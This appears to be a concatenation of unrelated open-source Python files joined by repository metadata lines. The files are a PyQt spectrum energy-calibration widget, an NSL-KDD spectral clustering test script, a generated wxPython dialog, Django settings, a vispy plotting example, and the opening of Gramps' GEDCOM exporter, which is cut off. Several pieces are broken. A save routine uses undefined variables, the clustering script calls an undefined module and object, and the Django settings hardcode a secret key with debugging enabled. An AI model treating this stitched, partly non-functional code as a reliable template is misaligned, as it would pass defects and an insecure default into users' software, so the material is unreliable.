GaussianWidthLayout.addWidget(self.GaussianWidthSpinBox) gaussianWidthWidget = qt.QWidget() gaussianWidthWidget.setLayout(GaussianWidthLayout) self.GaussianHeightSpinBox = qt.QDoubleSpinBox() self.GaussianHeightSpinBox.setMaximumWidth(100) self.GaussianHeightSpinBox.setMinimumWidth(70) self.GaussianHeightSpinBox.setAlignment(qt.Qt.AlignRight) self.GaussianHeightSpinBox.setMinimum(0.001) self.GaussianHeightSpinBox.setMaximum(10000000) self.GaussianHeightSpinBox.setDecimals(3) self.GaussianHeightSpinBox.setSingleStep(1) self.GaussianHeightSpinBox.setValue(5) self.GaussianHeightSpinBox.setEnabled(False) GaussianHeightLayout = qt.QHBoxLayout() GaussianHeightLayout.addWidget(qt.QLabel('height')) GaussianHeightLayout.addSpacing(10) GaussianHeightLayout.addWidget(self.GaussianHeightSpinBox) gaussianHeightWidget = qt.QWidget() gaussianHeightWidget.setLayout(GaussianHeightLayout) self.GaussianHeightSpinBox.setDisabled(True) self.autoscaleGaussianCheckBox = qt.QCheckBox('Autoscale height') self.autoscaleGaussianCheckBox.setChecked(True) gaussianLayout = qt.QGridLayout() gaussianLayout.addWidget(self.showGaussianCheckBox, 0, 0, 1, 2) gaussianLayout.addWidget(gaussianWidthWidget, 1, 0, 1, 1) gaussianLayout.addWidget(gaussianHeightWidget, 1, 2, 1, 1) gaussianLayout.addWidget(self.autoscaleGaussianCheckBox, 1, 3, 1, 1) gaussianWidget = qt.QWidget() gaussianWidget.setLayout(gaussianLayout) self.calibrateButton = qt.QPushButton('Convert') self.calibrateButton.setMinimumSize(75,75) self.calibrateButton.setMaximumSize(75,75) self.calibrateButton.clicked.connect(self.calibrateButtonClicked) self.saveButton = qt.QPushButton('Save') self.saveButton.setMinimumSize(75,75) self.saveButton.setMaximumSize(75,75) self.saveButton.clicked.connect(self.saveButtonClicked) self.saveButton.setDisabled(True) self.saveButton.setToolTip('Select output file\nto enable saving') self._inputLayout = qt.QHBoxLayout(self) self._inputLayout.addWidget(calibrationWidget) self._inputLayout.addWidget(gaussianWidget) self._inputLayout.addWidget(qt.HorizontalSpacer()) self._inputLayout.addWidget(self.calibrateButton) self._inputLayout.addWidget(self.saveButton) self._inputWidget = qt.QWidget() self._inputWidget.setLayout(self._inputLayout) self._rsLayout = qt.QVBoxLayout(self) self._rsLayout.addWidget(self._inputWidget) self._rsLayout.addWidget(self._plotSpectraWindow) self._rsWidget = qt.QWidget() self._rsWidget.setContentsMargins(0,0,0,-8) self._rsWidget.setLayout(self._rsLayout) self._lsLayout = qt.QVBoxLayout(self) self._lsLayout.addWidget(self._sourceWidget) self._lsLayout.addWidget(self._exportWidget) self._lsWidget = qt.QWidget() self._lsWidget.setContentsMargins(0,0,0,-8) self._lsWidget.setSizePolicy( qt.QSizePolicy(qt.QSizePolicy.Fixed, qt.QSizePolicy.Preferred)) self._lsWidget.setLayout(self._lsLayout) self._lsWidget.setMaximumWidth(500) self.splitter = qt.QSplitter(self) self.splitter.setOrientation(qt.Qt.Horizontal) self.splitter.setHandleWidth(5) self.splitter.setStretchFactor(1, 2) self.splitter.addWidget(self._lsWidget) self.splitter.addWidget(self._rsWidget) self._mainLayout = qt.QHBoxLayout() self._mainLayout.addWidget(self.splitter) self.setLayout(self._mainLayout) return 0 def connect_signals(self): self._sourceWidget.sigAddSelection.connect( self._plotSpectraWindow._addSelection) self._sourceWidget.sigRemoveSelection.connect( self._plotSpectraWindow._removeSelection) self._sourceWidget.sigReplaceSelection.connect( self._plotSpectraWindow._replaceSelection) self.autoscaleGaussianCheckBox.stateChanged.connect( self.autoscaleGaussianChanged) self._sourceWidget.sigAddSelection.connect(self._positionMarkers) self._sourceWidget.sigAddSelection.connect(self._selectionchanged) self._sourceWidget.sigReplaceSelection.connect(self._selectionchanged) self._exportWidget.OutputFileSelected.connect(self._enableSaveButton) self.showGaussianCheckBox.stateChanged.connect(self.gaussianOnOff) self._ezeroSpinBox.intersectionsChangedSignal.connect(self.zeroEnergyChanged) self._ezeroSpinBox.valueChanged.connect(lambda: self.zeroEnergyChanged(replot=True)) self.GaussianWidthSpinBox.valueChanged.connect(lambda: self.zeroEnergyChanged(replot=True)) self.GaussianHeightSpinBox.valueChanged.connect(lambda: self.zeroEnergyChanged(replot=True)) self._sourceWidget.sigReplaceSelection.connect(lambda: self.zeroEnergyChanged(replot=True)) return 0 def zeroEnergyChanged(self, replot=False): if self.showGaussianCheckBox.isChecked(): ezero = self._ezeroSpinBox.value() gwidth = self.GaussianWidthSpinBox.value() gheight = self.GaussianHeightSpinBox.value() if self.autoscaleGaussianCheckBox.isChecked(): curves = [c for c in self._plotSpectraWindow.getAllCurves(just_legend=True) if not c.startswith('Gaussian')] if len(curves): x, y = self._plotSpectraWindow.getCurve(curves[0])[:2] gheight = y[np.abs(x - ezero).argsort()][:5].mean() self.GaussianHeightSpinBox.setValue(gheight) gaussianX = np.linspace(ezero-3*gwidth, ezero+3*gwidth, 100) gaussianY = gheight * np.exp(-(gaussianX-ezero)**2/(2*(gwidth/2.3548)**2)) self._plotSpectraWindow.addCurve( gaussianX, gaussianY, 'Gaussian', ylabel=' ', replot=replot) def gaussianOnOff(self): if self.showGaussianCheckBox.isChecked(): self.GaussianWidthSpinBox.setEnabled(True) if not self.autoscaleGaussianCheckBox.isChecked(): self.GaussianHeightSpinBox.setEnabled(True) self.autoscaleGaussianCheckBox.setEnabled(True) self.zeroEnergyChanged(replot=True) else: self.GaussianWidthSpinBox.setEnabled(False) self.GaussianHeightSpinBox.setEnabled(False) self.autoscaleGaussianCheckBox.setEnabled(False) self._plotSpectraWindow.removeCurve('Gaussian ') def autoscaleGaussianChanged(self): if self.autoscaleGaussianCheckBox.isChecked(): self.GaussianHeightSpinBox.setEnabled(False) else: self.GaussianHeightSpinBox.setEnabled(True) def _enableSaveButton(self): self.saveButton.setEnabled(True) self.saveButton.setToolTip(None) def _positionMarkers(self): if not self._markersPositioned: limits = self._plotSpectraWindow.getGraphXLimits() self._ezeroSpinBox.setValue(0.5 * (limits[1]+limits[0])) self._markersPositioned = True def _selectionchanged(self): self.scansCalibrated = False self.calibrateButton.setEnabled(True) def calibrateButtonClicked(self): llist = self._plotSpectraWindow.getAllCurves() # Align scans self.calibratedScans = [] oldlegends = [] sourcenames = [s.sourceName for s in self._sourceWidget.sourceList] for i, scan in enumerate(llist): x, y, legend, scaninfo = scan[:4] if 'SourceName' not in scaninfo or legend.rstrip().endswith('ENE') \ or legend=='Gaussian ': continue sourceindex = sourcenames.index(scaninfo['SourceName']) dataObject = self._sourceWidget.sourceList[sourceindex].getDataObject(scaninfo['Key']) newdataObject = copy.deepcopy(dataObject) xindex = scaninfo['selection']['x'][0] yindex = scaninfo['selection']['y'][0] newx = x - self._ezeroSpinBox.value() newx *= self._ecalibSpinBox.value() * 1e-3 oldlegends.append(legend) newlegend = ''.join([legend, ' ENE']) scaninfo['Ezero'] = self._ezeroSpinBox.value() scaninfo['Ecalib'] = self._ecalibSpinBox.value() scaninfo['oldKey'] = newdataObject.info['Key'] scaninfo['oldX'] = scaninfo['selection']['cntlist'][ scaninfo['selection']['x'][0]] self._plotSpectraWindow.addCurve( newx, y, newlegend, scaninfo, xlabel='Energy', ylabel='', replot=False) self._plotSpectraWindow.setGraphXLabel('Energy') self._plotSpectraWindow.removeCurves(oldlegends) self._plotSpectraWindow.resetZoom() self.scansCalibrated = True self.calibrateButton.setDisabled(True) if not self._exportWidget._folderLineEdit.text() == '': self.saveButton.setEnabled(True) return def saveButtonClicked(self): curves = self._plotSpectraWindow.getAllCurves() dataObjects2save = [] sourcenames = [s.sourceName[0] for s in self._sourceWidget.sourceList] for curve in curves: if not legend.rstrip().endswith('ENE'): continue sourceindex = sourcenames.index(info['FileName']) dataObject = self._sourceWidget.sourceList[sourceindex].getDataObject(info['oldKey']) newdataObject = copy.deepcopy(dataObject) xindex = newdataObject.info['LabelNames'].index(info['oldX']) escale = newdataObject.data[:, xindex] - self._ezeroSpinBox.value() escale *= self._ecalibSpinBox.value() * 1e-3 if newdataObject.info['LabelNames'].count('Energy') > 0: ene_index = newdataObject.info['LabelNames'].index('Energy') newdataObject.data = np.vstack( [newdataObject.data[:,:ene_index].T, escale, newdataObject.data[:, ene_index+1:].T]).T else: newdataObject.data = np.vstack( [newdataObject.data[:,0], escale, newdataObject.data[:, 1:].T]).T newdataObject.info['LabelNames'] = newdataObject.info['LabelNames'][:1] + \ ['Energy'] + newdataObject.info['LabelNames'][1:] newdataObject.info['Command'] = '%s - energy calibrated' % ( info['Command']) header = [] header.append('#D %s\n' % time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))) for hline in newdataObject.info['Header']: if hline.startswith('#D'): continue if hline.startswith('#N'): continue if hline.startswith('#L'): continue header.append(hline) header.append('#C Parameters for energy calibration') header.append('#C Ezero: %s %s' % (info['Ezero'], info['oldX'])) header.append('#C Ecalib: %s meV / %s' % (info['Ecalib'], info['oldX'])) header.append('#C ') header.append('#N %d' % (len(newdataObject.info['LabelNames']))) header.append('#L %s' % (' '.join(newdataObject.info['LabelNames']))) newdataObject.info['Header'] = header dataObjects2save.append(newdataObject) specfilename = self._exportWidget.outputFile if not os.path.isfile(specfilename): with open('%s' % (specfilename), 'wb+') as f: fileheader = '#F %s\n\n' % (specfilename) f.write(fileheader.encode('ascii')) scannumber = 1 else: keys = SpecFileDataSource(specfilename).getSourceInfo()['KeyList'] scans = [int(k.split('.')[0]) for k in keys] scannumber = max(scans) + 1 for dataObject in dataObjects2save: output = [] command = dataObject.info['Command'] if self._exportWidget.askForScanName(): command = self._exportWidget.getScanName(command) if not command: command = dataObject.info['Command'] output.append('#S %d %s\n' % (scannumber, command)) header = dataObject.info['Header'] for item in header: if item.startswith('#S'): continue output.append(''.join([item, '\n'])) output.append(''.join('%s\n' % (' '.join([str(si) for si in s])) for s in dataObject.data.tolist())) output.append('\n') with open('%s' % (specfilename), 'ab+') as f: f.write(''.join(output).encode('ascii')) print('Spectrum saved to \"%s\"' % (specfilename)) key = SpecFileDataSource(specfilename).getSourceInfo()['KeyList'][-1] if self._exportWidget._datCheckBox.isChecked(): command = command.replace(':','_').replace(' ', '_') if not os.path.isdir(specfilename.rstrip('.spec')): os.mkdir(specfilename.rstrip('.spec')) datfilename = '%s/S%04d_%s_%s.dat' % ( specfilename.rstrip('.spec'), scannumber, key.split('.')[-1], command) np.savetxt('%s' % (datfilename), dataObject.data) print('Spectrum saved to \"%s\"\n' % (datfilename)) #~ scannumber +=1 self.saveButton.setDisabled(True) if __name__ == "__main__": import numpy as np app = qt.QApplication([]) app.lastWindowClosed.connect(app.quit) w = MainWindow() w.show() app.exec_()
mit
-7,016,220,558,226,067,000
40.281188
106
0.598258
false
4.24493
false
false
false
zedoul/AnomalyDetection
test_discretization/test_scikit_sc.py
1
3101
# -*- coding: utf-8 -*- """ http://www.astroml.org/sklearn_tutorial/dimensionality_reduction.html """ print (__doc__) import numpy as np import copy from sklearn.cluster import KMeans from sklearn.cluster import k_means from sklearn.manifold import spectral_embedding from sklearn.utils import check_random_state import nslkdd.preprocessing as preprocessing import sugarbee.reduction as reduction import sugarbee.distance as distance import sugarbee.affinity as affinity import sugarbee.solver as solver import scipy.sparse as sparse import scipy.sparse.csgraph as csgraph #def assign_undirected_weight(W, i, j, v): # W[i,j] = W[j,i] = v if __name__ == '__main__': import time start = time.time() datasize = 1000 print "preprocessing data..." df, headers = preprocessing.get_preprocessed_data(datasize) df_train = copy.deepcopy(df) df_train.drop('attack',1,inplace=True) df_train.drop('difficulty',1,inplace=True) print "normal" print len(df[df["attack"] == 11]) print "abnormal" print len(df[df["attack"] != 11]) print "data reduction..." proj = reduction.reduction(df_train, n_components=1) print "graph generation..." A = affinity.get_affinity_matrix(proj, metric_method=distance.gaussian,knn=200) # A = affinity.get_affinity_matrix(proj, metric_method=distance.dist, metric_param='euclidean', knn=8) # A = affinity.get_affinity_matrix(proj, metric_method=distance.dist, metric_param='manhattan', knn=8) # A = affinity.get_affinity_matrix(proj, metric_method=distance.cosdist,knn=8) D = affinity.get_degree_matrix(A) L = affinity.get_laplacian_matrix(A,D) print "data clustering..." Abin = None if sparse.isspmatrix(L): Abin = sparse.csc_matrix(L).sign() else: Abin = np.sign(L) numConn, connMap = csgraph.connected_components(Abin, directed = False) numClusters = numConn spectral = cluster.SpectralClustering(n_clusters = numClusters, affinity = "precomputed") y_spectral = spectral.fit_predict(A) res = y_spectral print "analyzing result..." t = df["attack"].values.tolist() f = df["difficulty"].values.tolist() print res[:10] print t[:10] print f[:10] # t : 11, normal # t : otherwise abnormal true_positive = 0 true_negative = 0 false_positive = 0 false_negative = 0 trueclass = 0 for i in range(datasize): if t[i] == 11 and res[i] == trueclass: true_positive = true_positive + 1 if t[i] != 11 and res[i] == trueclass: false_positive = false_positive + 1 if t[i] != 11 and res[i] != trueclass: true_negative = true_negative + 1 if t[i] == 11 and res[i] != trueclass: false_negative = false_negative + 1 print true_positive print true_negative print false_positive print false_negative elapsed = (time.time() - start) print "done in %s seconds" % (elapsed) tttt = 0 for zzz in est.labels_: if zzz == trueclass : tttt = tttt + 1 print tttt
mit
1,723,285,607,583,526,000
28.254717
105
0.64979
false
3.411441
false
false
false
turdusmerula/kipartman
kipartman/dialogs/dialog_main.py
1
3486
# -*- coding: utf-8 -*- ########################################################################### ## Python code generated with wxFormBuilder (version Dec 18 2018) ## http://www.wxformbuilder.org/ ## ## PLEASE DO *NOT* EDIT THIS FILE! ########################################################################### import wx import wx.xrc ########################################################################### ## Class DialogMain ########################################################################### class DialogMain ( wx.Frame ): def __init__( self, parent ): wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u"Kipartman", pos = wx.DefaultPosition, size = wx.Size( 1160,686 ), style = wx.DEFAULT_FRAME_STYLE|wx.TAB_TRAVERSAL ) self.SetSizeHints( wx.DefaultSize, wx.DefaultSize ) self.menu_bar = wx.MenuBar( 0 ) self.menu_file = wx.Menu() self.menu_file_project = wx.MenuItem( self.menu_file, wx.ID_ANY, u"Open project", wx.EmptyString, wx.ITEM_NORMAL ) self.menu_file.Append( self.menu_file_project ) self.menu_file.AppendSeparator() self.menu_buy_parts = wx.MenuItem( self.menu_file, wx.ID_ANY, u"Buy parts", u"Open the buy parts window", wx.ITEM_NORMAL ) self.menu_file.Append( self.menu_buy_parts ) self.menu_bar.Append( self.menu_file, u"File" ) self.menu_view = wx.Menu() self.menu_view_configuration = wx.MenuItem( self.menu_view, wx.ID_ANY, u"Configuration", wx.EmptyString, wx.ITEM_NORMAL ) self.menu_view.Append( self.menu_view_configuration ) self.menu_bar.Append( self.menu_view, u"View" ) self.menu_help = wx.Menu() self.menu_about = wx.MenuItem( self.menu_help, wx.ID_ANY, u"About", wx.EmptyString, wx.ITEM_NORMAL ) self.menu_help.Append( self.menu_about ) self.menu_bar.Append( self.menu_help, u"Help" ) self.SetMenuBar( self.menu_bar ) bSizer5 = wx.BoxSizer( wx.VERTICAL ) self.info = wx.InfoBar( self ) self.info.SetShowHideEffects( wx.SHOW_EFFECT_NONE, wx.SHOW_EFFECT_NONE ) self.info.SetEffectDuration( 500 ) bSizer5.Add( self.info, 0, wx.ALL|wx.EXPAND, 5 ) self.notebook = wx.Notebook( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, 0 ) bSizer5.Add( self.notebook, 1, wx.EXPAND |wx.ALL, 5 ) self.SetSizer( bSizer5 ) self.Layout() self.status = self.CreateStatusBar( 1, wx.STB_SIZEGRIP, wx.ID_ANY ) self.Centre( wx.BOTH ) # Connect Events self.Bind( wx.EVT_KILL_FOCUS, self.onKillFocus ) self.Bind( wx.EVT_MENU, self.onMenuFileProjetSelection, id = self.menu_file_project.GetId() ) self.Bind( wx.EVT_MENU, self.onMenuBuyPartsSelection, id = self.menu_buy_parts.GetId() ) self.Bind( wx.EVT_MENU, self.onMenuViewConfigurationSelection, id = self.menu_view_configuration.GetId() ) self.Bind( wx.EVT_MENU, self.onMenuHelpAboutSelection, id = self.menu_about.GetId() ) self.notebook.Bind( wx.EVT_NOTEBOOK_PAGE_CHANGED, self.onNotebookPageChanged ) self.notebook.Bind( wx.EVT_NOTEBOOK_PAGE_CHANGING, self.onNotebookPageChanging ) def __del__( self ): pass # Virtual event handlers, overide them in your derived class def onKillFocus( self, event ): event.Skip() def onMenuFileProjetSelection( self, event ): event.Skip() def onMenuBuyPartsSelection( self, event ): event.Skip() def onMenuViewConfigurationSelection( self, event ): event.Skip() def onMenuHelpAboutSelection( self, event ): event.Skip() def onNotebookPageChanged( self, event ): event.Skip() def onNotebookPageChanging( self, event ): event.Skip()
gpl-3.0
-5,311,697,587,579,618,000
32.84466
177
0.647734
false
3.068662
true
false
false
ayazmaroof/Yscrape
yelpsite/yelpsite/settings.py
1
2059
""" Django settings for yelpsite project. For more information on this file, see https://docs.djangoproject.com/en/1.7/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.7/ref/settings/ """ # Build paths inside the project like this: os.path.join(BASE_DIR, ...) import os BASE_DIR = os.path.dirname(os.path.dirname(__file__)) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = 'g#o84!cbq0&27c+qw9xl6nakxui40v$ml)ex!-1jvr)!%m+6s7' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True TEMPLATE_DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = ( 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', ) MIDDLEWARE_CLASSES = ( 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ) ROOT_URLCONF = 'yelpsite.urls' WSGI_APPLICATION = 'yelpsite.wsgi.application' # Database # https://docs.djangoproject.com/en/1.7/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Internationalization # https://docs.djangoproject.com/en/1.7/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'Asia/Singapore' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.7/howto/static-files/ STATIC_URL = '/static/'
mit
7,521,403,698,506,085,000
23.807229
71
0.728023
false
3.237421
false
false
false
Eric89GXL/vispy
examples/basics/scene/linear_region.py
2
2298
# -*- coding: utf-8 -*- # Copyright (c) Vispy Development Team. All Rights Reserved. # Distributed under the (new) BSD License. See LICENSE.txt for more info. """ Demonstration of InfiniteLine visual. """ import sys import numpy as np from vispy import app, scene # vertex positions of data to draw N = 200 pos = np.zeros((N, 2), dtype=np.float32) x_lim = [50., 750.] y_lim = [-2., 2.] pos[:, 0] = np.linspace(x_lim[0], x_lim[1], N) pos[:, 1] = np.random.normal(size=N) # color array color = np.ones((N, 4), dtype=np.float32) color[:, 0] = np.linspace(0, 1, N) color[:, 1] = color[::-1, 0] canvas = scene.SceneCanvas(keys='interactive', show=True) grid = canvas.central_widget.add_grid(spacing=0) viewbox = grid.add_view(row=0, col=1, camera='panzoom') # add some axes x_axis = scene.AxisWidget(orientation='bottom') x_axis.stretch = (1, 0.1) grid.add_widget(x_axis, row=1, col=1) x_axis.link_view(viewbox) y_axis = scene.AxisWidget(orientation='left') y_axis.stretch = (0.1, 1) grid.add_widget(y_axis, row=0, col=0) y_axis.link_view(viewbox) # add a line plot inside the viewbox line = scene.Line(pos, color, parent=viewbox.scene) # add vertical lines color = np.array([[1.0, 0.0, 0.0, 1.0], [0.0, 1.0, 0.0, 1.0], [0.0, 0.0, 1.0, 1.0], [0.0, 1.0, 0.0, 1.0], [1.0, 0.0, 0.0, 1.0], [0.0, 1.0, 0.0, 1.0]]) pos = np.array([100, 120, 140, 160, 180, 200], dtype=np.float32) vert_region1 = scene.LinearRegion(pos, color, parent=viewbox.scene) vert_region2 = scene.LinearRegion([549.2, 700], [0.0, 1.0, 0.0, 0.5], vertical=True, parent=viewbox.scene) # add horizontal lines pos = np.array([0.3, 0.0, -0.1], dtype=np.float32) hor_region1 = scene.LinearRegion(pos, [1.0, 0.0, 0.0, 0.5], vertical=False, parent=viewbox.scene) hor_region2 = scene.LinearRegion([-5.1, -2.0], [0.0, 0.0, 1.0, 0.5], vertical=False, parent=viewbox.scene) # auto-scale to see the whole line. viewbox.camera.set_range() if __name__ == '__main__' and sys.flags.interactive == 0: app.run()
bsd-3-clause
8,837,949,601,075,203,000
29.64
73
0.563098
false
2.802439
false
false
false
jralls/gramps
gramps/plugins/export/exportgedcom.py
1
59838
# # Gramps - a GTK+/GNOME based genealogy program # # Copyright (C) 2000-2007 Donald N. Allingham # Copyright (C) 2008 Brian G. Matherly # Copyright (C) 2008-2009 Gary Burton # Copyright (C) 2008 Robert Cheramy <robert@cheramy.net> # Copyright (C) 2010 Jakim Friant # Copyright (C) 2010 Nick Hall # Copyright (C) 2011 Tim G L Lyons # Copyright (C) 2012 Doug Blank <doug.blank@gmail.com> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. # "Export to GEDCOM" #------------------------------------------------------------------------- # # Standard Python Modules # #------------------------------------------------------------------------- import os import time #------------------------------------------------------------------------- # # Gramps modules # #------------------------------------------------------------------------- from gramps.gen.const import GRAMPS_LOCALE as glocale _ = glocale.translation.gettext from gramps.gen.lib import (AttributeType, ChildRefType, Citation, Date, EventRoleType, EventType, LdsOrd, NameType, PlaceType, NoteType, Person, UrlType) from gramps.version import VERSION import gramps.plugins.lib.libgedcom as libgedcom from gramps.gen.errors import DatabaseError from gramps.gen.updatecallback import UpdateCallback from gramps.gen.utils.file import media_path_full from gramps.gen.utils.place import conv_lat_lon from gramps.gen.utils.location import get_main_location from gramps.gen.display.place import displayer as _pd #------------------------------------------------------------------------- # # GEDCOM tags representing attributes that may take a parameter, value or # description on the same line as the tag # #------------------------------------------------------------------------- NEEDS_PARAMETER = set( ["CAST", "DSCR", "EDUC", "IDNO", "NATI", "NCHI", "NMR", "OCCU", "PROP", "RELI", "SSN", "TITL"]) LDS_ORD_NAME = { LdsOrd.BAPTISM : 'BAPL', LdsOrd.ENDOWMENT : 'ENDL', LdsOrd.SEAL_TO_PARENTS : 'SLGC', LdsOrd.SEAL_TO_SPOUSE : 'SLGS', LdsOrd.CONFIRMATION : 'CONL', } LDS_STATUS = { LdsOrd.STATUS_BIC : "BIC", LdsOrd.STATUS_CANCELED : "CANCELED", LdsOrd.STATUS_CHILD : "CHILD", LdsOrd.STATUS_CLEARED : "CLEARED", LdsOrd.STATUS_COMPLETED : "COMPLETED", LdsOrd.STATUS_DNS : "DNS", LdsOrd.STATUS_INFANT : "INFANT", LdsOrd.STATUS_PRE_1970 : "PRE-1970", LdsOrd.STATUS_QUALIFIED : "QUALIFIED", LdsOrd.STATUS_DNS_CAN : "DNS/CAN", LdsOrd.STATUS_STILLBORN : "STILLBORN", LdsOrd.STATUS_SUBMITTED : "SUBMITTED", LdsOrd.STATUS_UNCLEARED : "UNCLEARED", } LANGUAGES = { 'cs' : 'Czech', 'da' : 'Danish', 'nl' : 'Dutch', 'en' : 'English', 'eo' : 'Esperanto', 'fi' : 'Finnish', 'fr' : 'French', 'de' : 'German', 'hu' : 'Hungarian', 'it' : 'Italian', 'lt' : 'Latvian', 'lv' : 'Lithuanian', 'no' : 'Norwegian', 'po' : 'Polish', 'pt' : 'Portuguese', 'ro' : 'Romanian', 'sk' : 'Slovak', 'es' : 'Spanish', 'sv' : 'Swedish', 'ru' : 'Russian', } #------------------------------------------------------------------------- # # # #------------------------------------------------------------------------- MIME2GED = { "image/bmp" : "bmp", "image/gif" : "gif", "image/jpeg" : "jpeg", "image/x-pcx" : "pcx", "image/tiff" : "tiff", "audio/x-wav" : "wav" } QUALITY_MAP = { Citation.CONF_VERY_HIGH : "3", Citation.CONF_HIGH : "2", Citation.CONF_LOW : "1", Citation.CONF_VERY_LOW : "0", } PEDIGREE_TYPES = { ChildRefType.BIRTH : 'birth', ChildRefType.STEPCHILD: 'Step', ChildRefType.ADOPTED : 'Adopted', ChildRefType.FOSTER : 'Foster', } NOTES_PER_PERSON = 104 # fudge factor to make progress meter a bit smoother #------------------------------------------------------------------------- # # sort_handles_by_id # #------------------------------------------------------------------------- def sort_handles_by_id(handle_list, handle_to_object): """ Sort a list of handles by the Gramps ID. The function that returns the object from the handle needs to be supplied so that we get the right object. """ sorted_list = [] for handle in handle_list: obj = handle_to_object(handle) if obj: data = (obj.get_gramps_id(), handle) sorted_list.append(data) sorted_list.sort() return sorted_list #------------------------------------------------------------------------- # # breakup # #------------------------------------------------------------------------- def breakup(txt, limit): """ Break a line of text into a list of strings that conform to the maximum length specified, while breaking words in the middle of a word to avoid issues with spaces. """ if limit < 1: raise ValueError("breakup: unexpected limit: %r" % limit) data = [] while len(txt) > limit: # look for non-space pair to break between # do not break within a UTF-8 byte sequence, i. e. first char >127 idx = limit while (idx > 0 and (txt[idx - 1].isspace() or txt[idx].isspace() or ord(txt[idx - 1]) > 127)): idx -= 1 if idx == 0: #no words to break on, just break at limit anyway idx = limit data.append(txt[:idx]) txt = txt[idx:] if len(txt) > 0: data.append(txt) return data #------------------------------------------------------------------------- # # event_has_subordinate_data # may want to compare description w/ auto-generated one, and # if so, treat it same as if it were empty for this purpose # #------------------------------------------------------------------------- def event_has_subordinate_data(event, event_ref): """ determine if event is empty or not """ if event and event_ref: return (event.get_description().strip() or not event.get_date_object().is_empty() or event.get_place_handle() or event.get_attribute_list() or event_ref.get_attribute_list() or event.get_note_list() or event.get_citation_list() or event.get_media_list()) else: return False #------------------------------------------------------------------------- # # GedcomWriter class # #------------------------------------------------------------------------- class GedcomWriter(UpdateCallback): """ The GEDCOM writer creates a GEDCOM file that contains the exported information from the database. It derives from UpdateCallback so that it can provide visual feedback via a progress bar if needed. """ def __init__(self, database, user, option_box=None): UpdateCallback.__init__(self, user.callback) self.dbase = database self.dirname = None self.gedcom_file = None self.progress_cnt = 0 self.setup(option_box) def setup(self, option_box): """ If the option_box is present (GUI interface), then we check the "private", "restrict", and "cfilter" arguments to see if we need to apply proxy databases. """ if option_box: option_box.parse_options() self.dbase = option_box.get_filtered_database(self.dbase, self) def write_gedcom_file(self, filename): """ Write the actual GEDCOM file to the specified filename. """ self.dirname = os.path.dirname(filename) with open(filename, "w", encoding='utf-8') as self.gedcom_file: person_len = self.dbase.get_number_of_people() family_len = self.dbase.get_number_of_families() source_len = self.dbase.get_number_of_sources() repo_len = self.dbase.get_number_of_repositories() note_len = self.dbase.get_number_of_notes() / NOTES_PER_PERSON total_steps = (person_len + family_len + source_len + repo_len + note_len) self.set_total(total_steps) self._header(filename) self._submitter() self._individuals() self._families() self._sources() self._repos() self._notes() self._writeln(0, "TRLR") return True def _writeln(self, level, token, textlines="", limit=72): """ Write a line of text to the output file in the form of: LEVEL TOKEN text If the line contains newlines, it is broken into multiple lines using the CONT token. If any line is greater than the limit, it will broken into multiple lines using CONC. """ assert token if textlines: # break the line into multiple lines if a newline is found textlines = textlines.replace('\n\r', '\n') textlines = textlines.replace('\r', '\n') # Need to double '@' See Gedcom 5.5 spec 'any_char' if not textlines.startswith('@'): # avoid xrefs textlines = textlines.replace('@', '@@') textlist = textlines.split('\n') token_level = level for text in textlist: # make it unicode so that breakup below does the right thin. text = str(text) if limit: prefix = "\n%d CONC " % (level + 1) txt = prefix.join(breakup(text, limit)) else: txt = text self.gedcom_file.write("%d %s %s\n" % (token_level, token, txt)) token_level = level + 1 token = "CONT" else: self.gedcom_file.write("%d %s\n" % (level, token)) def _header(self, filename): """ Write the GEDCOM header. HEADER:= n HEAD {1:1} +1 SOUR <APPROVED_SYSTEM_ID> {1:1} +2 VERS <VERSION_NUMBER> {0:1} +2 NAME <NAME_OF_PRODUCT> {0:1} +2 CORP <NAME_OF_BUSINESS> {0:1} # Not used +3 <<ADDRESS_STRUCTURE>> {0:1} # Not used +2 DATA <NAME_OF_SOURCE_DATA> {0:1} # Not used +3 DATE <PUBLICATION_DATE> {0:1} # Not used +3 COPR <COPYRIGHT_SOURCE_DATA> {0:1} # Not used +1 DEST <RECEIVING_SYSTEM_NAME> {0:1*} # Not used +1 DATE <TRANSMISSION_DATE> {0:1} +2 TIME <TIME_VALUE> {0:1} +1 SUBM @XREF:SUBM@ {1:1} +1 SUBN @XREF:SUBN@ {0:1} +1 FILE <FILE_NAME> {0:1} +1 COPR <COPYRIGHT_GEDCOM_FILE> {0:1} +1 GEDC {1:1} +2 VERS <VERSION_NUMBER> {1:1} +2 FORM <GEDCOM_FORM> {1:1} +1 CHAR <CHARACTER_SET> {1:1} +2 VERS <VERSION_NUMBER> {0:1} +1 LANG <LANGUAGE_OF_TEXT> {0:1} +1 PLAC {0:1} +2 FORM <PLACE_HIERARCHY> {1:1} +1 NOTE <GEDCOM_CONTENT_DESCRIPTION> {0:1} +2 [CONT|CONC] 